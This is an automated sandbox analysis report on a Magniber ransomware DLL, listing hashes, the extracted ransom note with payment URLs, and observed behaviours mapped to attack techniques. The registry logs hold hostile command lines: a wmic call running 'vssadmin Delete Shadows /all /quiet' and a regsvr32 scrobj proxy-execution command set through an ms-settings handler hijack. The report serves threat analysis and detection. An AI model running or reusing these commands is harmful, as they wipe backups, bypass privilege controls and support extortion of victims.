magniber | 929a064ebaea59c3bd2442df949754d1cdd12cb547929927ec7b7adaafc05726

Analysis

max time kernel
149s
max time network
147s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
10-10-2024 19:39

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

3187619e1573920b7ef0cf1daecdabd4_JaffaCakes118.dll
Size

20KB
MD5

3187619e1573920b7ef0cf1daecdabd4
SHA1

aa3831500894819b2444f25af36e8ddc7aea1cda
SHA256

929a064ebaea59c3bd2442df949754d1cdd12cb547929927ec7b7adaafc05726
SHA512

c83121077118fe574aec011e91b95d985edf2377aae453065009dea9479850724ae0861f02338f876a3a7827c4e079a8faec229ec5939520eb9ef66d27e30d1a
SSDEEP

384:mCx9m9yVxnPhI1hEtGFlGgRzeZHtJmTqP2F47vhdds6sWDa:mk9m9yVxPhshEtGFlGgRze7Jxhrs

Score

10^/10

magniber defense_evasion discovery execution impact ransomware

Malware Config

Extracted

Path

C:\Users\Admin\Pictures\readme.txt

Family

magniber

Ransom Note

ALL YOUR DOCUMENTS PHOTOS DATABASES AND OTHER IMPORTANT FILES HAVE BEEN ENCRYPTED! ==================================================================================================== Your files are NOT damaged! Your files are modified only. This modification is reversible. The only 1 way to decrypt your files is to receive the private key and decryption program. Any attempts to restore your files with the third party software will be fatal for your files! ==================================================================================================== To receive the private key and decryption program follow the instructions below: 1. Download "Tor Browser" from https://www.torproject.org/ and install it. 2. In the "Tor Browser" open your personal page here: http://beac32f0063cfc3090illvahk.m647u2xsjtlfyzuevlxjiiwjsg2btyhmbxbjz4in4hm76u6hjzc62wad.onion/illvahk Note! This page is available via "Tor Browser" only. ==================================================================================================== Also you can use temporary addresses on your personal page without using "Tor Browser": http://beac32f0063cfc3090illvahk.ourunit.xyz/illvahk http://beac32f0063cfc3090illvahk.topsaid.site/illvahk http://beac32f0063cfc3090illvahk.gosmark.space/illvahk http://beac32f0063cfc3090illvahk.iecard.top/illvahk Note! These are temporary addresses! They will be available for a limited amount of time!

URLs

http://beac32f0063cfc3090illvahk.m647u2xsjtlfyzuevlxjiiwjsg2btyhmbxbjz4in4hm76u6hjzc62wad.onion/illvahk

http://beac32f0063cfc3090illvahk.ourunit.xyz/illvahk

http://beac32f0063cfc3090illvahk.topsaid.site/illvahk

http://beac32f0063cfc3090illvahk.gosmark.space/illvahk

http://beac32f0063cfc3090illvahk.iecard.top/illvahk

Signatures

Detect magniber ransomware 1 IoCs

resource	yara_rule
behavioral2/memory/4124-0-0x000001C3A8F80000-0x000001C3A97F2000-memory.dmp	family_magniber

Magniber Ransomware
Ransomware family widely seen in Asia being distributed by the Magnitude exploit kit.
ransomware magniber

Process spawned unexpected child process 50 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

description	pid	pid_target	Process	procid_target
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4716	1772	vssadmin.exe	106
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2228	1772	cmd.exe	106
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4548	1772	cmd.exe	106
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3716	1772	vssadmin.exe	106
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4264	1772	cmd.exe	106
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1092	1772	cmd.exe	106
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5368	1772	vssadmin.exe	106
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5384	1772	vssadmin.exe	106
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5420	1772	vssadmin.exe	106
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5464	1772	vssadmin.exe	106
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5504	1772	vssadmin.exe	106
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5712	1772	cmd.exe	106
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5748	1772	cmd.exe	106
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2020	1772	vssadmin.exe	106
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4032	1772	vssadmin.exe	106
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	6092	1772	vssadmin.exe	106
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5512	1772	cmd.exe	106
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2876	1772	cmd.exe	106
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5828	1772	vssadmin.exe	106
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5872	1772	vssadmin.exe	106
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5380	1772	vssadmin.exe	106
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3044	1772	cmd.exe	106
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5324	1772	cmd.exe	106
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	872	1772	vssadmin.exe	106
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3416	1772	vssadmin.exe	106
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2884	1772	vssadmin.exe	106
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5516	1772	cmd.exe	106
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5840	1772	cmd.exe	106
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1352	1772	vssadmin.exe	106
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3600	1772	vssadmin.exe	106
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5340	1772	vssadmin.exe	106
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4652	1772	cmd.exe	106
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3044	1772	cmd.exe	106
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5356	1772	vssadmin.exe	106
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5772	1772	vssadmin.exe	106
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4964	1772	vssadmin.exe	106
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5396	1772	cmd.exe	106
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5108	1772	cmd.exe	106
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5740	1772	vssadmin.exe	106
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5964	1772	vssadmin.exe	106
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5264	1772	cmd.exe	106
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3388	1772	vssadmin.exe	106
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5176	1772	cmd.exe	106
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5880	1772	vssadmin.exe	106
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4772	1772	vssadmin.exe	106
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5620	1772	vssadmin.exe	106
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5372	1772	cmd.exe	106
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	6060	1772	cmd.exe	106
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3976	1772	vssadmin.exe	106
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5964	1772	vssadmin.exe	106

Deletes shadow copies 3 TTPs
Ransomware often targets backup files to inhibit system recovery.
ransomware defense_evasion impact execution

File Deletion
T1070.004

Inhibit System Recovery
T1490

Windows Management Instrumentation
T1047
Renames multiple (72) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
ransomware

Suspicious use of SetThreadContext 14 IoCs

description	pid	Process	procid_target
PID 4124 set thread context of 2596	4124	rundll32.exe	44
PID 4124 set thread context of 2624	4124	rundll32.exe	45
PID 4124 set thread context of 2800	4124	rundll32.exe	48
PID 4124 set thread context of 3408	4124	rundll32.exe	56
PID 4124 set thread context of 3572	4124	rundll32.exe	57
PID 4124 set thread context of 3764	4124	rundll32.exe	58
PID 4124 set thread context of 3852	4124	rundll32.exe	59
PID 4124 set thread context of 3916	4124	rundll32.exe	60
PID 4124 set thread context of 3996	4124	rundll32.exe	61
PID 4124 set thread context of 3796	4124	rundll32.exe	62
PID 4124 set thread context of 1924	4124	rundll32.exe	64
PID 4124 set thread context of 2880	4124	rundll32.exe	76
PID 4124 set thread context of 3312	4124	rundll32.exe	80
PID 4124 set thread context of 3272	4124	rundll32.exe	81

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Checks processor information in registry 2 TTPs 4 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	backgroundTaskHost.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	backgroundTaskHost.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	backgroundTaskHost.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	backgroundTaskHost.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe

Interacts with shadow copies 3 TTPs 30 IoCs

Shadow copies are often targeted by ransomware to inhibit system recovery.

ransomware

File Deletion

T1070.004

Inhibit System Recovery

T1490

Direct Volume Access

T1006

pid	Process
5964	vssadmin.exe
3976	vssadmin.exe
5964	vssadmin.exe
5872	vssadmin.exe
2884	vssadmin.exe
3600	vssadmin.exe
5340	vssadmin.exe
5772	vssadmin.exe
5420	vssadmin.exe
5380	vssadmin.exe
872	vssadmin.exe
5880	vssadmin.exe
3716	vssadmin.exe
2020	vssadmin.exe
5356	vssadmin.exe
4772	vssadmin.exe
5620	vssadmin.exe
4032	vssadmin.exe
3416	vssadmin.exe
5740	vssadmin.exe
5464	vssadmin.exe
5504	vssadmin.exe
3388	vssadmin.exe
4716	vssadmin.exe
5384	vssadmin.exe
1352	vssadmin.exe
5368	vssadmin.exe
6092	vssadmin.exe
5828	vssadmin.exe
4964	vssadmin.exe

Modifies Internet Explorer settings 1 TTPs 2 IoCs

adware spyware

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\SOFTWARE\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running"	Explorer.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\SOFTWARE\Microsoft\Internet Explorer\IESettingSync\SlowSettingTypesChanged = "2"	Explorer.EXE

Modifies registry class 54 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000_Classes\ms-settings\shell\open\command	svchost.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000_Classes\ms-settings\shell\open\command\DelegateExecute = "0"	RuntimeBroker.exe
Key created	\REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000_Classes\ms-settings\shell\open\command	RuntimeBroker.exe
Key created	\REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000_Classes\ms-settings\shell	taskhostw.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000_Classes\ms-settings\shell\open\command\ = "regsvr32.exe scrobj.dll /s /u /n /i:C:\\Users\\Public\\readme.txt"	taskhostw.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\	Explorer.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000_Classes\ms-settings\shell\open\command\DelegateExecute = "0"	rundll32.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000_Classes\ms-settings\shell\open\command\ = "regsvr32.exe scrobj.dll /s /u /n /i:C:\\Users\\Public\\readme.txt"	RuntimeBroker.exe
Key created	\REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000_Classes\ms-settings\shell\open\command	taskhostw.exe
Key created	\REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000_Classes\ms-settings\shell\open\command	TextInputHost.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000_Classes\ms-settings\shell\open\command\DelegateExecute = "0"	RuntimeBroker.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000_Classes\ms-settings\shell\open\command\ = "C:\\Windows\\system32\\wbem\\wmic process call create \"vssadmin.exe Delete Shadows /all /quiet\""	Explorer.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000_Classes\ms-settings\shell\open\command\ = "C:\\Windows\\system32\\wbem\\wmic process call create \"vssadmin.exe Delete Shadows /all /quiet\""	svchost.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.contentdeliverymanager_cw5n1h2txyewy\Internet Settings\Cache\Content\CachePrefix	backgroundTaskHost.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000_Classes\ms-settings\shell\open\command\ = "regsvr32.exe scrobj.dll /s /u /n /i:C:\\Users\\Public\\readme.txt"	sihost.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000_Classes\ms-settings\shell\open\command\ = "regsvr32.exe scrobj.dll /s /u /n /i:C:\\Users\\Public\\readme.txt"	rundll32.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000_Classes\ms-settings\shell\open\command\DelegateExecute = "0"	svchost.exe
Key created	\REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000_Classes\ms-settings\shell\open\command	svchost.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000_Classes\ms-settings\shell\open\command\DelegateExecute = "0"	taskhostw.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000_Classes\ms-settings\shell\open\command\DelegateExecute = "0"	RuntimeBroker.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000_Classes\ms-settings\shell\open\command\ = "regsvr32.exe scrobj.dll /s /u /n /i:C:\\Users\\Public\\readme.txt"	RuntimeBroker.exe
Key created	\REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000_Classes\ms-settings\shell\open\command	sihost.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.MicrosoftEdge.Stable_8wekyb3d8bbwe\WasEverActivated = "1"	sihost.exe
Key created	\REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000_Classes\ms-settings\shell\open\command	StartMenuExperienceHost.exe
Key created	\REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000_Classes\ms-settings\shell\open\command	RuntimeBroker.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000_Classes\ms-settings\shell\open\command\DelegateExecute = "0"	svchost.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.contentdeliverymanager_cw5n1h2txyewy\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:"	backgroundTaskHost.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000_Classes\ms-settings\shell\open\command\DelegateExecute = "0"	sihost.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000_Classes\ms-settings\shell\open\command\ = "C:\\Windows\\system32\\wbem\\wmic process call create \"vssadmin.exe Delete Shadows /all /quiet\""	svchost.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000_Classes\ms-settings\shell\open\command\ = "C:\\Windows\\system32\\wbem\\wmic process call create \"vssadmin.exe Delete Shadows /all /quiet\""	DllHost.exe
Key created	\REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000_Classes\ms-settings\shell\open\command	DllHost.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000_Classes\ms-settings\shell\open\command\ = "C:\\Windows\\system32\\wbem\\wmic process call create \"vssadmin.exe Delete Shadows /all /quiet\""	RuntimeBroker.exe
Key created	\REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000_Classes\Local Settings\MuiCache	backgroundTaskHost.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.Search_cw5n1h2txyewy\WasEverActivated = "1"	sihost.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000_Classes\ms-settings\shell\open\command\ = "C:\\Windows\\system32\\wbem\\wmic process call create \"vssadmin.exe Delete Shadows /all /quiet\""	sihost.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000_Classes\ms-settings\shell\open\command\ = "C:\\Windows\\system32\\wbem\\wmic process call create \"vssadmin.exe Delete Shadows /all /quiet\""	rundll32.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000_Classes\ms-settings\shell\open\command\ = "regsvr32.exe scrobj.dll /s /u /n /i:C:\\Users\\Public\\readme.txt"	svchost.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000_Classes\ms-settings\shell\open\command\ = "regsvr32.exe scrobj.dll /s /u /n /i:C:\\Users\\Public\\readme.txt"	Explorer.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000_Classes\ms-settings\shell\open\command\DelegateExecute = "0"	Explorer.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000_Classes\ms-settings\shell\open\command\ = "regsvr32.exe scrobj.dll /s /u /n /i:C:\\Users\\Public\\readme.txt"	svchost.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.contentdeliverymanager_cw5n1h2txyewy\Internet Settings\Cache\History\CachePrefix = "Visited:"	backgroundTaskHost.exe
Key created	\REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000_Classes\ms-settings	taskhostw.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000_Classes\ms-settings\shell\open\command\ = "C:\\Windows\\system32\\wbem\\wmic process call create \"vssadmin.exe Delete Shadows /all /quiet\""	taskhostw.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\	Explorer.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000_Classes\ms-settings\shell\open\command\ = "regsvr32.exe scrobj.dll /s /u /n /i:C:\\Users\\Public\\readme.txt"	DllHost.exe
Key created	\REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000_Classes\ms-settings\shell\open\command	RuntimeBroker.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000_Classes\ms-settings\shell\open\command\ = "regsvr32.exe scrobj.dll /s /u /n /i:C:\\Users\\Public\\readme.txt"	RuntimeBroker.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000_Classes\ms-settings\shell\open\command\ = "C:\\Windows\\system32\\wbem\\wmic process call create \"vssadmin.exe Delete Shadows /all /quiet\""	RuntimeBroker.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000_Classes\ms-settings\shell\open\command\DelegateExecute = "0"	DllHost.exe
Key created	\REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000_Classes\ms-settings\shell\open	taskhostw.exe
Key created	\REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000_Classes\ms-settings\shell\open\command	rundll32.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000_Classes\ms-settings\shell\open\command\ = "C:\\Windows\\system32\\wbem\\wmic process call create \"vssadmin.exe Delete Shadows /all /quiet\""	RuntimeBroker.exe
Key created	\REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000_Classes\ms-settings\shell\open\command	Explorer.EXE

Opens file in notepad (likely ransom note) 1 IoCs

ransomware

pid	Process
3132	notepad.exe

Suspicious behavior: EnumeratesProcesses 12 IoCs

pid	Process
4124	rundll32.exe
4124	rundll32.exe
4848	msedge.exe
4848	msedge.exe
4400	msedge.exe
4400	msedge.exe
5660	identity_helper.exe
5660	identity_helper.exe
4200	msedge.exe
4200	msedge.exe
4200	msedge.exe
4200	msedge.exe

Suspicious behavior: GetForegroundWindowSpam 2 IoCs

pid	Process
3408	Explorer.EXE
2800	taskhostw.exe

Suspicious behavior: MapViewOfSection 14 IoCs

pid	Process
4124	rundll32.exe
4124	rundll32.exe
4124	rundll32.exe
4124	rundll32.exe
4124	rundll32.exe
4124	rundll32.exe
4124	rundll32.exe
4124	rundll32.exe
4124	rundll32.exe
4124	rundll32.exe
4124	rundll32.exe
4124	rundll32.exe
4124	rundll32.exe
4124	rundll32.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 10 IoCs

pid	Process
4400	msedge.exe
4400	msedge.exe
4400	msedge.exe
4400	msedge.exe
4400	msedge.exe
4400	msedge.exe
4400	msedge.exe
4400	msedge.exe
4400	msedge.exe
4400	msedge.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeShutdownPrivilege	3408	Explorer.EXE
Token: SeCreatePagefilePrivilege	3408	Explorer.EXE
Token: SeShutdownPrivilege	3408	Explorer.EXE
Token: SeCreatePagefilePrivilege	3408	Explorer.EXE
Token: SeShutdownPrivilege	3408	Explorer.EXE
Token: SeCreatePagefilePrivilege	3408	Explorer.EXE
Token: SeShutdownPrivilege	3408	Explorer.EXE
Token: SeCreatePagefilePrivilege	3408	Explorer.EXE
Token: SeShutdownPrivilege	3408	Explorer.EXE
Token: SeCreatePagefilePrivilege	3408	Explorer.EXE
Token: SeShutdownPrivilege	3408	Explorer.EXE
Token: SeCreatePagefilePrivilege	3408	Explorer.EXE
Token: SeShutdownPrivilege	3408	Explorer.EXE
Token: SeCreatePagefilePrivilege	3408	Explorer.EXE
Token: SeShutdownPrivilege	3408	Explorer.EXE
Token: SeCreatePagefilePrivilege	3408	Explorer.EXE
Token: SeShutdownPrivilege	3408	Explorer.EXE
Token: SeCreatePagefilePrivilege	3408	Explorer.EXE
Token: SeShutdownPrivilege	3408	Explorer.EXE
Token: SeCreatePagefilePrivilege	3408	Explorer.EXE
Token: SeShutdownPrivilege	3408	Explorer.EXE
Token: SeCreatePagefilePrivilege	3408	Explorer.EXE
Token: SeShutdownPrivilege	3408	Explorer.EXE
Token: SeCreatePagefilePrivilege	3408	Explorer.EXE
Token: SeShutdownPrivilege	3408	Explorer.EXE
Token: SeCreatePagefilePrivilege	3408	Explorer.EXE
Token: SeShutdownPrivilege	3408	Explorer.EXE
Token: SeCreatePagefilePrivilege	3408	Explorer.EXE
Token: SeIncreaseQuotaPrivilege	3020	wmic.exe
Token: SeSecurityPrivilege	3020	wmic.exe
Token: SeTakeOwnershipPrivilege	3020	wmic.exe
Token: SeLoadDriverPrivilege	3020	wmic.exe
Token: SeSystemProfilePrivilege	3020	wmic.exe
Token: SeSystemtimePrivilege	3020	wmic.exe
Token: SeProfSingleProcessPrivilege	3020	wmic.exe
Token: SeIncBasePriorityPrivilege	3020	wmic.exe
Token: SeCreatePagefilePrivilege	3020	wmic.exe
Token: SeBackupPrivilege	3020	wmic.exe
Token: SeRestorePrivilege	3020	wmic.exe
Token: SeShutdownPrivilege	3020	wmic.exe
Token: SeDebugPrivilege	3020	wmic.exe
Token: SeSystemEnvironmentPrivilege	3020	wmic.exe
Token: SeRemoteShutdownPrivilege	3020	wmic.exe
Token: SeUndockPrivilege	3020	wmic.exe
Token: SeManageVolumePrivilege	3020	wmic.exe
Token: 33	3020	wmic.exe
Token: 34	3020	wmic.exe
Token: 35	3020	wmic.exe
Token: 36	3020	wmic.exe
Token: SeIncreaseQuotaPrivilege	4912	wmic.exe
Token: SeSecurityPrivilege	4912	wmic.exe
Token: SeTakeOwnershipPrivilege	4912	wmic.exe
Token: SeLoadDriverPrivilege	4912	wmic.exe
Token: SeSystemProfilePrivilege	4912	wmic.exe
Token: SeSystemtimePrivilege	4912	wmic.exe
Token: SeProfSingleProcessPrivilege	4912	wmic.exe
Token: SeIncBasePriorityPrivilege	4912	wmic.exe
Token: SeCreatePagefilePrivilege	4912	wmic.exe
Token: SeBackupPrivilege	4912	wmic.exe
Token: SeRestorePrivilege	4912	wmic.exe
Token: SeShutdownPrivilege	4912	wmic.exe
Token: SeDebugPrivilege	4912	wmic.exe
Token: SeSystemEnvironmentPrivilege	4912	wmic.exe
Token: SeRemoteShutdownPrivilege	4912	wmic.exe

Suspicious use of FindShellTrayWindow 25 IoCs

pid	Process
4400	msedge.exe
4400	msedge.exe
4400	msedge.exe
4400	msedge.exe
4400	msedge.exe
4400	msedge.exe
4400	msedge.exe
4400	msedge.exe
4400	msedge.exe
4400	msedge.exe
4400	msedge.exe
4400	msedge.exe
4400	msedge.exe
4400	msedge.exe
4400	msedge.exe
4400	msedge.exe
4400	msedge.exe
4400	msedge.exe
4400	msedge.exe
4400	msedge.exe
4400	msedge.exe
4400	msedge.exe
4400	msedge.exe
4400	msedge.exe
4400	msedge.exe

Suspicious use of SendNotifyMessage 24 IoCs

pid	Process
4400	msedge.exe
4400	msedge.exe
4400	msedge.exe
4400	msedge.exe
4400	msedge.exe
4400	msedge.exe
4400	msedge.exe
4400	msedge.exe
4400	msedge.exe
4400	msedge.exe
4400	msedge.exe
4400	msedge.exe
4400	msedge.exe
4400	msedge.exe
4400	msedge.exe
4400	msedge.exe
4400	msedge.exe
4400	msedge.exe
4400	msedge.exe
4400	msedge.exe
4400	msedge.exe
4400	msedge.exe
4400	msedge.exe
4400	msedge.exe

Suspicious use of UnmapMainImage 5 IoCs

pid	Process
1924	RuntimeBroker.exe
3408	Explorer.EXE
3852	StartMenuExperienceHost.exe
3916	RuntimeBroker.exe
3796	RuntimeBroker.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2800 wrote to memory of 3132	2800	taskhostw.exe	86
PID 2800 wrote to memory of 3132	2800	taskhostw.exe	86
PID 2800 wrote to memory of 2020	2800	taskhostw.exe	87
PID 2800 wrote to memory of 2020	2800	taskhostw.exe	87
PID 2800 wrote to memory of 3020	2800	taskhostw.exe	88
PID 2800 wrote to memory of 3020	2800	taskhostw.exe	88
PID 2800 wrote to memory of 2720	2800	taskhostw.exe	89
PID 2800 wrote to memory of 2720	2800	taskhostw.exe	89
PID 2800 wrote to memory of 3884	2800	taskhostw.exe	90
PID 2800 wrote to memory of 3884	2800	taskhostw.exe	90
PID 3916 wrote to memory of 4912	3916	RuntimeBroker.exe	95
PID 3916 wrote to memory of 4912	3916	RuntimeBroker.exe	95
PID 3916 wrote to memory of 2300	3916	RuntimeBroker.exe	96
PID 3916 wrote to memory of 2300	3916	RuntimeBroker.exe	96
PID 3916 wrote to memory of 1796	3916	RuntimeBroker.exe	97
PID 3916 wrote to memory of 1796	3916	RuntimeBroker.exe	97
PID 3884 wrote to memory of 3760	3884	cmd.exe	102
PID 3884 wrote to memory of 3760	3884	cmd.exe	102
PID 2300 wrote to memory of 2004	2300	cmd.exe	103
PID 2300 wrote to memory of 2004	2300	cmd.exe	103
PID 2720 wrote to memory of 832	2720	cmd.exe	104
